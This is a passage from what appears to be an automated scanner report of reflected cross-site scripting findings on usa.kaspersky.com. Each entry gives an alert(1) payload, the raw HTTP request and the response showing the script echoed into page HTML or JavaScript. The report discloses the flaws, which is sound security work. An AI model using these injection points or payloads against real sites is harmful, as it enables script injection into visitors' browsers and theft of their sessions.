Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145483"
Content-Type: text/html; charset=utf-8
Content-Length: 30229
Date: Sun, 04 Sep 2011 14:11:37 GMT
X-Varnish: 1163257584
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/search/apachesolr_search/index.html646e5"><script>alert(1)</script>ba42b202e41" />
...[SNIP]...

1.164. http://usa.kaspersky.com/search/apachesolr_search/index.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/search/apachesolr_search/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3d0b"><script>alert(1)</script>be3c5cc808 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/apachesolr_search/index.html?d3d0b"><script>alert(1)</script>be3c5cc808=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:07:56 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145276"
Content-Type: text/html; charset=utf-8
Content-Length: 30522
Date: Sun, 04 Sep 2011 14:08:08 GMT
X-Varnish: 1163249569
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/search/apachesolr_search/index.html?d3d0b"><script>alert(1)</script>be3c5cc808=1" />
...[SNIP]...

1.165. http://usa.kaspersky.com/search/apachesolr_search/xss [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/search/apachesolr_search/xss

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ede6"><script>alert(1)</script>33cc4e8f02d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search1ede6"><script>alert(1)</script>33cc4e8f02d/apachesolr_search/xss HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes; gpv_pageName=Homepage; s_nr=1315139037033-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fusa.kaspersky.com%25252Ffiles%25252Fcustom_search%25252Fsearch-grey.gif%2526ot%253DIMAGE; NO_CACHE=Y

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:52:57 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315140777"
Content-Type: text/html; charset=utf-8
Content-Length: 30762
Date: Sun, 04 Sep 2011 12:53:32 GMT
X-Varnish: 1163098818
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/search1ede6"><script>alert(1)</script>33cc4e8f02d/apachesolr_search/xss" />
...[SNIP]...

1.166. http://usa.kaspersky.com/search/apachesolr_search/xss [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/search/apachesolr_search/xss

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af2e6"-alert(1)-"2ac881d387c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /searchaf2e6"-alert(1)-"2ac881d387c/apachesolr_search/xss HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes; gpv_pageName=Homepage; s_nr=1315139037033-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fusa.kaspersky.com%25252Ffiles%25252Fcustom_search%25252Fsearch-grey.gif%2526ot%253DIMAGE; NO_CACHE=Y

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:54:44 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315140884"
Content-Type: text/html; charset=utf-8
Content-Length: 30665
Date: Sun, 04 Sep 2011 12:55:25 GMT
X-Varnish: 1163101369
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/searchaf2e6"-alert(1)-"2ac881d387c/apachesolr_search/xss";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.167. http://usa.kaspersky.com/search/apachesolr_search/xss [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/search/apachesolr_search/xss

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7d30"><script>alert(1)</script>1c2b9503e52 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/apachesolr_searcha7d30"><script>alert(1)</script>1c2b9503e52/xss HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes; gpv_pageName=Homepage; s_nr=1315139037033-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fusa.kaspersky.com%25252Ffiles%25252Fcustom_search%25252Fsearch-grey.gif%2526ot%253DIMAGE; NO_CACHE=Y

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:57:18 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141038"
Content-Type: text/html; charset=utf-8
Content-Length: 30245
Date: Sun, 04 Sep 2011 12:57:23 GMT
X-Varnish: 1163106279
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/search/apachesolr_searcha7d30"><script>alert(1)</script>1c2b9503e52/xss" />
...[SNIP]...

1.168. http://usa.kaspersky.com/search/apachesolr_search/xss [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/search/apachesolr_search/xss

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f302c"><script>alert(1)</script>4c19078928f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/apachesolr_search/xssf302c"><script>alert(1)</script>4c19078928f HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes; gpv_pageName=Homepage; s_nr=1315139037033-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fusa.kaspersky.com%25252Ffiles%25252Fcustom_search%25252Fsearch-grey.gif%2526ot%253DIMAGE; NO_CACHE=Y

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:01:44 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141304"
Content-Type: text/html; charset=utf-8
Content-Length: 30180
Date: Sun, 04 Sep 2011 13:02:02 GMT
X-Varnish: 1163114265
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/search/apachesolr_search/xssf302c"><script>alert(1)</script>4c19078928f" />
...[SNIP]...

1.169. http://usa.kaspersky.com/search/apachesolr_search/xss [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/search/apachesolr_search/xss

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0ef0"><script>alert(1)</script>70160970dfe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/apachesolr_search/xss?c0ef0"><script>alert(1)</script>70160970dfe=1 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes; gpv_pageName=Homepage; s_nr=1315139037033-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fusa.kaspersky.com%25252Ffiles%25252Fcustom_search%25252Fsearch-grey.gif%2526ot%253DIMAGE; NO_CACHE=Y

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:48:03 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315140483"
Content-Type: text/html; charset=utf-8
Content-Length: 30037
Date: Sun, 04 Sep 2011 12:48:58 GMT
X-Varnish: 1163089822
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/search/apachesolr_search/xss?c0ef0"><script>alert(1)</script>70160970dfe=1" />
...[SNIP]...

1.170. http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css [REST URL parameter 10] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css

Issue detail

The value of REST URL parameter 10 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a65a4"-alert(1)-"2aa5ec6e5f1 was submitted in the REST URL parameter 10. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.cssa65a4"-alert(1)-"2aa5ec6e5f1?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:33:36 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139616"
Content-Type: text/html; charset=utf-8
Content-Length: 31332
Date: Sun, 04 Sep 2011 12:33:41 GMT
X-Varnish: 1163068406
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.cssa65a4"-alert(1)-"2aa5ec6e5f1?R";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.171. http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css [REST URL parameter 10] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css

Issue detail

The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8058e"><script>alert(1)</script>98cdc6b835d was submitted in the REST URL parameter 10. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css8058e"><script>alert(1)</script>98cdc6b835d?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:32:47 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139567"
Content-Type: text/html; charset=utf-8
Content-Length: 31428
Date: Sun, 04 Sep 2011 12:33:00 GMT
X-Varnish: 1163067106
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css8058e"><script>alert(1)</script>98cdc6b835d?R" />
...[SNIP]...

1.172. http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45325"><script>alert(1)</script>c89d0f96b80 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites45325"><script>alert(1)</script>c89d0f96b80/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:20:16 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138816"
Content-Type: text/html; charset=utf-8
Content-Length: 31430
Date: Sun, 04 Sep 2011 12:20:18 GMT
X-Varnish: 1163046389
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites45325"><script>alert(1)</script>c89d0f96b80/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R" />
...[SNIP]...

1.173. http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50a3f"-alert(1)-"80bc3e9188a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites50a3f"-alert(1)-"80bc3e9188a/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:20:23 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138823"
Content-Type: text/html; charset=utf-8
Content-Length: 31333
Date: Sun, 04 Sep 2011 12:20:24 GMT
X-Varnish: 1163046534
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites50a3f"-alert(1)-"80bc3e9188a/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! ***********
...[SNIP]...

1.174. http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42cc5"-alert(1)-"19bcc8754ee was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/all42cc5"-alert(1)-"19bcc8754ee/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:20:59 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138859"
Content-Type: text/html; charset=utf-8
Content-Length: 31333
Date: Sun, 04 Sep 2011 12:21:01 GMT
X-Varnish: 1163047466
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/all42cc5"-alert(1)-"19bcc8754ee/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
...[SNIP]...

1.175. http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e94c"><script>alert(1)</script>8ee69f6e42a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all8e94c"><script>alert(1)</script>8ee69f6e42a/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
